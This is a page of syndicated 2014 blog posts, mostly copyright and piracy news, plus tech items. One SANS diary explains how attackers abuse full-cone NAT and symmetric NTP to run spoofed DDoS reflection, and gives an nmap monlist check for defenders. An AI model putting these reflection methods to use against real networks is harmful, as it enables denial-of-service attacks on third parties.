Posts tagged ‘Other’

TorrentFreak: Movie Boss Avoids Copyright Q&A to Avoid Piracy “Crazies”

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

runningThe main thrust from the government and entertainment industry figures is that something pretty drastic needs to be done about the illegal downloading habits of many Australians.

Consumer groups and citizens, on the other hand, want any response to be measured and coupled with assurances from entertainment companies that Australians will stop being treated like second-class consumers. Local ISPs have varying opinions, depending on the depth of their Big Media affiliations.

Back in July a discussion paper leaked revealing government proposals that include measures such as the tweaking of ISP liability right through to ‘pirate’ website blocking. Communications Minister Malcolm Turnbull later indicated that a public Q&A would be held in September for representatives from the entertainment industries, ISPs, and consumer groups to air their thoughts on the proposals.

While the opportunity was welcomed by the majority of stakeholders, it’s now clear that not everyone will be there.

Village Roadshow is the company that mounted the most aggressive anti-piracy legal action ever against iiNet, one of Australia’s largest ISPs. They have a deep interest in how this debate pans out. This morning, however, co-CEO Graham Burke told ZDNet that his company wouldn’t be attending the discussions because he’ll be overseas at the time.

While that may be true, an email Burke sent to Turnbull and other participants shines rather more light on the topic.

“My company is not prepared to participate in the forum. As expressed to you previously these Q and A style formats are judged by the noise on the night and given the proposed venue I believe this will be weighted by the crazies,” Burke told the Minister.

According to ZDNet, attendees from the ISP industry will include iiNet CEO David Buckingham, Telstra executive director Jane Van Beelen and Foxtel CEO Richard Freudenstein.

On a musical front the Australasian Performing Right Association (APRA) will be in attendance, as will writer and producer Peter Duncan. Looking after the interests of citizens will be consumer group Choice, but it appears Burke and Village Roadshow are concerned about potential dissent from the “crazies”.

“What is at stake here is the very future of Australian film production itself and it is too crucially important to Australia’s economy and the fabric of our society to put at risk with what will be a miniscule group whose hidden agenda is theft of movies,” Burke told the Minister.

It’s perhaps understandable for the movie boss to avoiding walking into a losing battle, but referring to those that do wish to participate in an open debate as having a hidden agenda of “movie theft” isn’t going to win over potential allies.

Boycotting discussions in which people get the opportunity to air their perhaps opposing opinions doesn’t indicate a willingness to enter a dialog or negotiations either.

But that might be the nail on the head right there.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: CACC Recap

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’m finally back from the Crimes Against Children Conference (CACC) and caught up from a week’s worth of out-of-office backlog.

CACC is a really fascinating conference. The topic is serious, sobering, and definitely not “fun” in the traditional sense. It focuses on child abuse, child exploitation, and related issues. Talks ranged from horrific case studies to setting up a sting operation. (I never thought about it, but the officers waiting behind the door are in a very specific order. The suspect really doesn’t stand a chance when the cops burst through the doorway.) The fun part, to me, is how amazing all of the people at the conference are, how informative the sessions were, and how I literally learned something new everywhere I turned, even at the evening dinner social gathering.

One of the best things I attended was the Forensic Challenge. This was the first year that they did it. They turned a hotel room into a crime scene and let teams work the scene. I was given special permission to sit quietly and observe as one group went through the mocked-up suspect’s apartment. This was way better than anything on TV, and I’m still blown away by everything I saw and learned. For example, one guy interviewed the suspect while the other two tossed the place. They systematically searched everything. One guy started off dropping to the floor and looking under the furniture before checking everything. The end result looked like a tornado went through the scene.

Afterwards, I asked if real crime scenes look as ransacked after being searched. “No,” said the veteran officer who ran the challenge. “This team put stuff back.” (The team that I observed didn’t win, but they did better than most teams and they weren’t even LEOs!)

What am I doing here?

Speakers at CACC are by invitation-only. Last year I was invited to give a talk. This year, I was asked to give four hands-on training sessions.

Some of the conference’s training sessions went for a half-day or a full-day, and most went really deep into their topic. I decided to take a different route and ended up giving an overview: “In 90 minutes I will not make you an expert on digital photo analysis. But I will give you an idea about what can be done and give you a little hands-on experience.”

Understanding digital photo analysis is critical for people who investigate child-related abuses. Telling real photos from computer graphics can make the difference between a conviction and a walk. In some cases, being able to quickly pull information out of pictures can mean the difference between life and death. My tools and methods are specifically designed to speed up the analysis process, rapidly extract critical details, and allow the analyst to accurately reach the correct conclusion with a high degree of confidence.

There will be a quiz

Even though I practiced this talk for months, I was still concerned about the timing. I knew that I had way too much material for the scheduled time. Worse: I didn’t get get the chance to practice in front of a live audience. The first time I actually gave this presentation to a large group was when I walked into the first training session. Yet, the first class ended at exactly 90 minutes. The second class was a little rushed (lots of people had computer troubles at the beginning and that ate nearly 10 minutes), but it still ended on time. And the last two classes were right on schedule. (Whew!)

I did include one surprise in my presentation, just to check their understanding. At the beginning of each class, I showed them a few pictures and asked if they trusted their eyes. Some pictures were real, some were digitally enhanced, and some were completely computer generated. At the end of the talk, I assigned those same pictures to the class (one picture per row of desks) and gave them exactly three minutes to evaluate their assigned image. (Why three minutes? Many photo analysis tools can take hours for an investigator to evaluate results. With my system, a trained person can evaluate a typical photo in under a minute and achieve a high-confidence result. But these students are not fully trained, so I gave then a few extra minutes. Literally: you have three minutes to evaluate one photo.)

After the allotted time, I asked each table for their results. “Table 1: Is that real, digitally enhanced or computer generated?” Someone would shout back “Fake!” I’d then ask “How do you know?” and they would tell me which analyzers and what they saw. I’d do exactly what they said on the big screen and elaborated on the results.

I had been warned that the first training session of the conference would likely be the most alert since everyone was fully rested. But really, the first class stunned me. As a whole, they nailed the pop quiz. The first class even had multiple people per table describing what they found. Despite the fact that I went very quickly though each section, they still understood it enough to ace the quiz.

The second class was right after lunch, so I expected them to be a little lethargic. They got most of the important observations. The other two classes were on the last day of the conference — and after week of lectures and a big late-night social event. Both classes thought that three minutes was not long enough but still did well. (Not bad for covering six complex topics with about 10 minutes per section, and then only given them three minutes to apply what they learned.)

Heuristics and Results

The conference ended on Thursday, but I’ve already begun to hear from people who attended my training classes. Each class had between 25 and 35 people, and I’m thrilled that people found value in my training sessions.

For myself, I took away a lot of ideas. With a little research and work, things I learned from talks on psychology and behavioral analysis may be applicable to digital photo forensics. Even little observations made jokingly over dinner may end up forming valuable heuristics or statistical models. I left the conference with three pages of notes about potential research projects. With any luck, a few will even become future blog topics.

/dev/ttyS0 : Mucking About With SquashFS

This post was syndicated from: /dev/ttyS0 and was written by: Craig. Original post: at /dev/ttyS0

SquashFS is an incredibly popular file system for embedded Linux devices. Unfortunately, it is also notorious for being hacked up by vendors, causing the standard SquashFS tools (i.e., unsquashfs) to fail when extracting these file systems.

While projects like the Firmware-Mod-Kit (FMK) have amassed many unsquashfs utilities to work with a wide range of SquashFS variations found in the wild, this approach has several draw backs, most notably that each individual unsquashfs tool only supports its one particular variation. If you run into a SquashFS image that is mostly compatible with a given unsquashfs tool, but has some minor modification, you can’t extract it – and worse, you probably don’t know why.

So what are these “minor modifications” that cause unsquashfs to fail?

It generally comes down to compression, specifically, lzma. Although SquashFS 4.0 now supports a wide variety of compression types, ’twas not always thus. Prior to version 4, SquashFS only officially supported zlib compression. However, lzma compresses much smaller, so many embedded vendors hacked in lzma support, and of course they all did it in a slightly different way.

Some vendors put the standard 13-byte lzma header in front of all their compressed data blocks, which includes important compression meta-data, most notably the lzma properties used to compress that of the data block:

struct lzma_header
{
    uint8_t properties;          // Contains the lc, lp, and pb property values
    uint32_t dictionary_size;
    uint64_t uncompressed_size;
};

This makes decompressing each data block straightforward; even so, the official SquashFS tools assume that any SquashFS file system prior to 4.0 is compressed using zlib, requiring special lzma versions of these tools to be built in order to support lzma compressed file systems prior to version 4.

Some vendors omitted the uncompressed size field from the lzma header of each data block:

struct lzma_header
{
    uint8_t properties;          // Contains the lc, lp, and pb property values
    uint32_t dictionary_size;
    //uint64_t uncompressed_size;
};

This kind of makes sense, since the uncompressed size field is not really required anyway; SquashFS code will know the exact, or at least the maximum, size of each data block, and lzma itself will just keep uncompressing data until it’s done. While it is valid to set the uncompressed size field to -1 in the lzma header if the size of the original data is not known at compression time, lzma decompressors still expect this field to exist. If it doesn’t, the decompressor will interpret whatever bytes happen to be there as the uncompressed size field, which likely won’t make sense, and decompression will fail.

Other implementations decided to encode lzma properties for each compressed data block using their own custom structure. Take DD-WRT for example:

struct lzma_header
{
    uint8_t pb;
    uint8_t lc;
    uint8_t lp;
    uint8_t unk;
};

Some just use hard-coded compression properties for all data blocks, so there’s no lzma header at the beginning their compressed data blocks at all. Further, these properties are not necessarily the default lzma property values:

// lzma zlib simplified wrapper
#include <zlib.h>

#define ZLIB_LC 0  // The default value for lc is 3; here, it's been changed to 0
#define ZLIB_LP 0
#define ZLIB_PB 2
...

Still others throw seemingly unnecessary data into the beginning of their data blocks, like the string “7zip”.

Due to the use of non-standard compression, many vendors also change the SquashFS “magic bytes”, which makes standard unsquashfs utilities think that the SquashFS image is invalid.

All this, coupled with the fact that most unsquashfs utilities are pedantic about which SquashFS version(s) they support, requires anyone interested in extracting embedded file systems to litter their system with many different unsquashfs variants.


Luckily, the latest unsquashfs utility supports all versions of SquashFS (v1 – v4). While it still suffers from all the other above problems, it provides a useful base from which to develop a more “hacker friendly” tool.

In a (perhaps futile) attempt to write one extraction tool to support as many SquashFS variations as possible, sasquatch was born. It’s basically unsquashfs v4.3 that has been modified with some nifty features:

  • Doesn’t care about the SquashFS magic bytes
  • Doesn’t trust the reported compression header field
  • Tries all supported decompressors until it finds one that works, regardless of the SquashFS version
  • Adds some vendor-specific lzma implementations to the supported decompressor list
  • Includes an “adaptive” lzma decompressor that attempts to dynamically identify lzma compression options
  • Provides more fine-grained command line control over decompression and debug output

The adaptive lzma decompressor is perhaps the best feature, as it not only generically auto-detects and decompresses several known vendor variations, but potentially can detect and decompress yet-unknown variations. In fact, it has already been able to extract SquashFS images that could not be extracted by any of the unsquashfs utilities in the Firmware-Mod-Kit.

With that said, the code is still beta and there are a couple of known SquashFS images that sasquatch can’t extract (yet). Bug reports and patches welcome.

TorrentFreak: Attackers Can ‘Steal’ Bandwidth From BitTorrent Seeders, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

swarmBitTorrent is one of the fastest and most efficient ways to share large files over the Internet. The popular file-sharing protocol is used by dozens of millions of people every day and accounts for a substantial amount of total Internet traffic.

This popularity makes BitTorrent an interesting target for attacks, which various anti-piracy companies have shown in the past. One of these possible attacks was recently unveiled by Florian Adamsky, researcher at the City University London.

In an article published in “Computers & Security” Adamsky and his colleagues reveal an exploit which allows attackers to get a higher download rate from seeders than other people.

In technical terms, the exploit misuses BitTorrent’s choking mechanism of clients that use the “Allowed Fast” extension. Attackers can use this to keep a permanent connection with seeders, requesting the same pieces over and over.

The vulnerability was extensively tested in swarms of various sizes and the researchers found that three malicious peers can already slow download times up to 414.99%. When the number of attackers is greater compared to the number of seeders, the worse the effect becomes.

The impact of the attack further depends on the download clients being used by the seeders in the swarm. The mainline BitTorrent clients and uTorrent are not vulnerable for example, while Vuze, Transmission and Libtorrent-based clients are.

TorrentFreak spoke with Adamsky who predicts that similar results are possible in real swarms. Even very large swarms of more than 1,000 seeders could be affected through a botnet, although it’s hard to predict the precise impact.

“If an attacker uses a botnet to attack the swarm, I think it would be possible to increase the average download time of all peers [of swarms with 1,000 seeders] up to three times,” Adamsky tells us.

“If most of the clients would have a vulnerable client like Vuze or Transmission it would be possible to increase the average download time up ten times,” he adds.

In their paper the researchers suggest a relatively easy fix to the problem, through an update of the “Allowed Fast” extension. In addition, they also propose a new seeding algorithm that is less prone to these and other bandwidth attacks.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Court: Usenet Provider Doesn’t Have to Filter Pirated Content

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

news-serviceIn 2009, Dutch anti-piracy group BREIN, representing the movie and music industries, took Europe’s largest Usenet provider News-Service Europe (NSE) to court.

Through the court BREIN demanded that NSE delete all infringing content from its servers, and in 2011 the Court of Amsterdam sided with the copyright holders.

The Court argued that NSE willingly facilitated copyright infringement through its services. In its verdict the Court ruled that NSE had to remove all copyrighted content, and filter future posts for possible copyright infringements.

Responding to the verdict the Usenet provider said that it was economically unfeasible to filter all messages. The company therefore saw no other option than to shut down its services while the appeal was pending.

This week the Appeals Court ruled on the case overturning the previous verdict, setting a more positive precedent for Usenet providers and similar services.

The Court concluded that NSE does not facilitate copyright infringement as long as it maintains a procedure through which copyright holders can send unlimited takedown notices.

In addition, the Court decided that proactive filtering of copyrighted content is not required, as that conflicts with existing jurisprudence of the European Court of Justice.

“We are very pleased with this ruling,” NSE CEO Patrick Schreurs says. “The Court correctly states that a Usenet provider such as News-Service Europe can not be expected to proactively monitor the messages others place.”

The ruling this week is an interlocutory verdict. The Court still has to rule on how NSE’s notice and takedown procedure should operate. Afterwards, both BREIN and NSE still have the option to take the case to the Supreme Court.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Coghlan: Why Python 4.0 won’t be like Python 3.0

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Python core developer Nick Coghlan seeks
to dispel worries
that an eventual Python 4.0 release will be as
disruptive as 3.0 was. “Why mention this point? Because this switch
to ‘Unicode by default’ is the most disruptive of the backwards
incompatible changes in Python 3 and unlike the others (which were more
language specific), it is one small part of a much larger industry wide
change in how text data is represented and manipulated. With the language
specific issues cleared out by the Python 3 transition, a much higher
barrier to entry for new language features compared to the early days of
Python and no other industry wide migrations on the scale of switching from
‘binary data with an encoding’ to Unicode for text modelling currently in
progress, I can’t see any kind of change coming up that would require a
Python 3 style backwards compatibility break and parallel support
period.

TorrentFreak: Major Torrent Sites and Google Purge The Expendables 3

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

With The Expendables 3 now officially released in theaters, the autopsy over its leak last month and the potential effects on box office figures has begun.

Many news outlets reported yesterday that the first weekend’s takings represent a flop for the third in the Expendables franchise and, of course, those closest to Hollywood are pointing the figure firmly at piracy.

But on the ground, on some of the very sites accused of facilitating piracy of the action movie, there are signs which suggests that this leaked title is being treated somewhat differently to any that have gone before.

LimeTorrents

Noting that the site was named in a Lions Gate lawsuit, TF monitored for the presence of The Expendables 3 torrents on popular torrent site LimeTorrents. The result is shown in the image below.

Lime-Expend

While the site lists 14 torrents, not a single working Expendables 3 torrent appears in the search results. The three that do appear are sponsored links that do not lead to anything useful.

But while LimeTorrents are clearly doing all they can to comply with the terms of a lawsuit, other sites that have not been named by Lions Gate also appear to have been taking action.

KickassTorrents

KickassTorrents is the world’s second largest torrent site and the go-to place for many looking for fresh content. However, anyone searching for leaked Expendables 3 torrents will be going home disappointed. There are currently nine torrents returned in results, all of which are trailers. The leaked movie cannot be found.

Kick-expend

It’s worth noting that like many of the leading torrent sites, Kickass removes torrents following copyright holder requests, so that goes someway to explaining why the Expendables 3 torrents have all disappeared. What is notable, however, is that no fresh ones seem to be reappearing as is usually the case.

RARBG

There’s a similar story over at RARBG, the site placed 10th in our Top Torrent Sites 2014 post. A search produces the two torrents shown in the screenshot below and as they clearly point out, these definitely ain’t The Expendables.

rarbg

BitSnoop

The effect of these takedowns, whether from rightsholders or introduced on a voluntary basis, can also be seen on torrent sites that specialize in indexing torrents found elsewhere. BitSnoop, the 9th most popular torrent site online with an index of 23 million torrents, currently has none related to The Expendables 3.

bitsnoop-expend

Torrentz

Over at Torrentz, a meta-search engine that indexes content on other sites, we can see that just four torrents are returned following an Expendables 3 search, none of which are the movie in question.The links at the top are sponsored and don’t relate to torrents.

The note at the bottom reveals that 41 torrent links have been removed following DMCA notices and their euro equivalent. Again, no more torrents seem to be reappearing.

torrentz-expend

Google

While torrents disappearing and not reappearing within major torrent sites is quite unusual in itself, perhaps the most dramatic effect can be seen in Google search results.

As previously documented, Lions Gate has put in a herculean effort to have listings removed. This, combined with any torrent site self-censorship efforts, has resulted in a tiny number of usable entries in the first 20 pages of Google results for common searches such as ‘The Expendables 3 + download + torrent’.

Of course, more experienced downloaders and those who persevere through a few searches can still find torrents and other ways to watch the movie. Torrents still remain on The Pirate Bay too, but there are clear signs that the leak of this movie is being treated differently from any other in recent memory, and not only by those involved in its legal distribution either.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Raspberry Pi: The first Raspberry Pi computer room in Togo

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Dominique Laloux first got in touch with us in May 2013 when he was on the point of leaving to spend a year in the rural Kuma region of Togo in Western Africa, an area where, until 2012, 75% of teachers had never used a computer. He had previously joined a team of Togolese friends to set up the Kuma Computer Center in the mountain village of Kuma Tokpli for the students and teachers of five local secondary schools, and planned to introduce Raspberry Pis there.

computer room in Kuma Tokpli

The building that currently houses Kuma Computer Center’s first computer room in Kuma Tokpli

We next heard from Dominique earlier this month. We were delighted to learn that besides the Center’s first computer room, which has now been up and running for almost two years, the team has established a fully functional Raspberry Pi computer room, with 21 Pis and a couple of other PCs, in Kuma Adamé, a village about 20 minutes’ motorbike ride from Kuma Tokpli. This will be used daily by the 200 students of the local middle school, and was financed largely by former Adamé residents who have settled in Lomé, Togo’s capital. A team of students and teachers from The International School of Brussels, where Dominique works, helped fund the purchase of the Raspberry Pis and their accessories.

Raspberry Pi computer room in Kuma Adamé

The new Raspberry Pi computer room in Kuma Adamé

The initial focus is on teaching the students basic computer literacy, and the team chose the Raspberry Pi based on its low initial cost, its anticipated low maintenance costs, its low power consumption and its use of Open Source software. Dominique believes – and we think he’s probably right – that this is the first Raspberry Pi computer room in Togo! He says,

The most important thing is that we now have a nearly complete “recipe” for the setup of a computer room anywhere in Togo, that would fit a middle school/high school for a total cost of about 6000€. The recipe includes the renovation of a school disaffected room (see what our room looked like 6 months ago in the picture), the installation of electricity and local area network at European standards, the design of furniture built by local workers, the training of teachers, the development of a curriculum to teach, the selection of a local support team, etc. Quite an experience, I must say.

Soon to be the new Raspberry Pi computer room!

Before work began on the new computer room

Key to the sustainability of the project is that it has been developed within the local community for the benefit of community members, having begun as an idea of teachers in Kuma. Various groups in the community are represented in the management of the project, contributing different kinds of support and expertise. Dominique again:

We are particularly proud of the setup in K. Adamé (we being Seth, Désiré, all other members of the Kuma Computer Center team, and myself). [...] Our project has been operational for nearly 2 years now and it relies mainly on villagers themselves. Seth, who is in charge of the infrastsructure in K. Tokpli, is a local farmer growing mainly coffee and cocoa. A team of villagers is responsible for opening the room every day for 2 hours at least, and “cleaning teams” make sure the rooms stay in perfect condition. Local teachers will now take over the regular “computer classes” I taught during the entire past school year — sometimes going up to 40 hours per week. The newly installed Raspberry Pi reinforces our infrastructure and will serve 200+ students in K. Adamé from the next school year…

Currently the team is constructing a small building in Kuma Tokpli, which will become the permanent base of the Kuma Computer Center (and the second largest building in the small village), superseding the facility currently made available by a local farmers’ association. They also continue to work on the curriculum, and hope to introduce the students to programming in addition to teaching ICT and using the Raspberry Pis and other computers to support learning across the curriculum.

If you’d like to support the Kuma Computer Center, with funds or otherwise, have a look at their website. And if you’ve got an idea as good as this one to teach young people about computing, you’ll want know about the Raspberry Pi Education Fund, recently opened for applications and aimed at supporting initiatives like this with match funding; learn more here!

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that with no port forwarding enabled through the firewall that Internet originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled the firewall would treat outbound UDP transactions as I described earlier.  When a device on your network initiates an outbound connection to a server responses from that server are permitted back into your network.  Since UDP is stateless most firewalls simulate state with a timeout.  In other words if no traffic is seen between the device and the server for 600 seconds then don’t permit any response from the server until there is new outbound traffic. But anytime related traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection,  both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 

Of course UDP is stateless so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port permitting the attacker to direct the attack against any IP and port on the Internet.  It is exceedingly difficult to trace these attacks back to the source so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of the attackers holding holding these communications open for months.  

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters then the likelihood of this sort of attack is lowered substantially.  In a nutshell anti-spoofing says that if the traffic is headed into my network and the source IP address is from my network then the source IP must be spoofed, so drop the packet.  It also works in the converse.  If a packet is leaving my network and the source IP address is not an IP address from my network then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers.  A single nmap command will quickly confirm if any are open on your network. nmap -sU  -A -n -PN -pU:123 –script=ntp-monlist .  If you find one or more perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT you may want to see if your gateway router implements the equivalent of  the Pace “Strict UDP Session Controlâ€�.  This will prevent an attacker from access misconfigured UDP servers on your network. 

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: U.S. Court Grants Order to Wipe Pirate Sites from the Internet

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

stop-blockedThe entertainment industries often complain that they have virtually no means to target pirate sites, especially those run from overseas.

This grim outlook isn’t shared by the operators of ABS-CBN, the largest media and entertainment company in the Philippines, who filed a lawsuit against several unauthorized streaming sites at a District Court in Oregon.

The company’s complaint alleges a mixture of trademark and copyright infringement against a dozen websites including Pinoystreaming.com, Pinoytvko.biz and Pinoy-tube.com. The sites in question are operated by different people, some of whom have no apparent connection to the United States.

To stop the sites from operating as quickly as possible the media company requested a temporary restraining order. This was done under seal without the knowledge of the defendants, as ABS-CBN feared that they would otherwise switch domain names and continue operating as usual.

“Absent a temporary restraining order, Defendants will be able to completely erase the status quo by transferring the benefits of their prior illegal activities to new websites,” the company argued.

In short, ABS-CBN requested power to take the sites offline before the owners knew that they were getting sued, and without a chance to defend themselves. While that may seem a lot to ask, Judge Anna Brown granted the request.

Earlier this month the Judge signed the temporary restraining order which bars the operators from running their sites. In addition, it allows the media company to order hosting companies to take down the servers, domain registrars to seize the domain names, and search engines to remove all results linking to the sites.

“Upon Plaintiffs’ request, those with actual notice of the injunction, including any Internet search engines, Web hosts, domain-name registrars, and domain name registries or their administrators, shall cease facilitating access to any or all domain names and websites…,” the order reads.

The court also ordered the domain name registrars to point the domains to a copy of the complaint, so the website owners would know why their sites had been wiped from the Internet. Further, to prevent the defendants from passing on Google traffic to a new domain, ABS-CBN was granted permission to access the Google Webmaster Tools of the defendants.

“Plaintiffs may enter the Subject Domain Names into Google’s Webmaster Tools and cancel any redirection of the domains that have been entered there by Defendants which redirect traffic to a new domain name or website and thereby evade the provisions of this Order,” the order reads.

The above is just part of the injunction which effectively shuts down the sites in question. All websites in the suit are now redirected to a copy of the complaint. Also, several domains are no longer present in Google’s search results.

The preliminary injunction is unique in its kind, both due to its broadness and the fact that it happened without due process. This has several experts worried, including EFF’s Intellectual Property Director Corynne McSherry.

“It’s very worrisome that a court would issue a rapid and broad order affecting speech based on allegations, without careful consideration and an opportunity for the targets to defend themselves,” McSherry tells TorrentFreak.

In addition to the restraining order, Judge Brown also granted ABS-CBN’s request to freeze all financial assets of the defendants until further notice. The defendants were given the option to appeal both orders after they were issued, but it’s unknown whether they have done so.

This is not the first ex-parte injunction to be handed down against alleged pirate sites this month. The same happened in the Expendables 3 case, although this order wasn’t nearly as broad as the one against the Filipino streaming sites.

Whether it’s the start of a new trend has yet to be seen, but considering the broad measures judges are willing to sign off, things could get messy.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google — YouTube is specially mentioned — and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies — somehow related to the cyberweapons arms manufacturer Gamma International — just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA — and GCHQ and CESG — are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Diebert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

TorrentFreak: ISPs Face Lawsuits After Failing to Block The Pirate Bay

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

pirate bayFollowing favorable rulings on website-blocking from both the European Court of Justice and the local Supreme Court, at the end of July several Austrian movie companies renewed their mission to have ‘pirate’ sites blocked at the ISP level.

VAP, the anti-piracy association of the Austrian film and video industry, wrote to several local ISPs – UPC, Drei, Tele2 and A1 – demanding a blockade of three domains – ThePirateBay.se, Movie4K.to and Kinox.to.

Just days later the IFPI signaled its intention to join the fray. In a letter dated August 4 and sent to five local ISPs, the music group set a deadline of less than two weeks for the service providers to block subscriber access to ThePirateBay,se, isoHunt.to, 1337x.to and H33t.to.

After the VAP letter came talks between the anti-piracy outfit and the ISPs, but a deadline of August 14 expired last week with no blocking having taken place. While the courts have confirmed that in certain circumstances service providers can be required to block errant sites, it appears that the ISPs don’t want to take action based on mere requests from rightsholders.

“We continue to believe that the decision to block websites or other Internet content should lie with the courts and legislators,” UPC told Austrian news outlet Future Zone.

“We have sympathy for rightsholders and we are in full support of the creative industries. However, we offer our customers access to the Internet and have no obligation or right to choose which content is accessed.”

Faced with blocking requests around Europe, most if not all ISPs have required a court order in order to restrict access to ‘pirate’ sites. Given this history, UPC’s reluctance comes as no surprise to VAP. Managing Director Werner Müller admitted last week that it was always unlikely that the ISPs would act without being legally required to do so. That means legal action, and VAP are ready for it.

“There will soon be a lawsuit concerning blocking against two websites – kinox.to and movie4k.to – against four major domestic Internet providers,” Müller says. “The lawsuits are prepared and are waiting almost only on their delivery.”

And, according to comments made by IFPI CEO Franz Medwenitsch, the music industry won’t be far behind.

“As of today there has been no response from the service providers so we had our attorney begin the preparations for legal action,” Medwenitsch confirms.

These web-blocking cases being brought against Austrian ISPs are of particular importance as they represent the first to take place following the March 27 ruling of the European Court of Justice. How that ruling is interpreted will be closely watched by rightsholders across the continent.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Third Unreleased Doctor Who Episode Leaks Online

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

In July, news broke that following a serious error at a BBC office in Miami, the scripts and video to the brand new series of Doctor Who had accidentally been made available online.

While the BBC closed down the security breach, it didn’t do so quickly enough. The scripts were made available on file-sharing networks first and they were soon followed by the leak of the first episode.

Destined for Marcelo Camargo of Marc Drei Productions, a Brazil-based production company known for its subtitling work, the unfinished ‘workprint’ release wasn’t to be the last. Less than a week ago the first full copies of the second episode “Into The Dalek” started doing the rounds, prompting concerns of whether the leaks would stop there or continue.

That question now seems to have been answered. A 1020Mb file currently being made available via The Pirate Bay is the third episode in the new series. The file follows the naming convention of the previous two leaks suggesting that the video comes from the same source.

Rumored to be titled “Robots of Sherwood”, the episode confirms details revealed in the leaked scripts and sees Doctor Who venturing back in time for a memorable meeting with Robin Hood.

Dr-robin

As can be seen from the screenshot, the episode is presented in monochrome and is heavily watermarked. Special effects and other elements of final polish also appear to be absent.

The question now falls to whether the remaining three episodes of six will also leak to mainstream file-sharing networks such as BitTorrent. There are reports of episodes four, five and six appearing on the eD2K network (sometimes known as eDonkey) but thus far there are no confirmed full downloads.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Lorem Ipsum: Of Good & Evil, Google & China

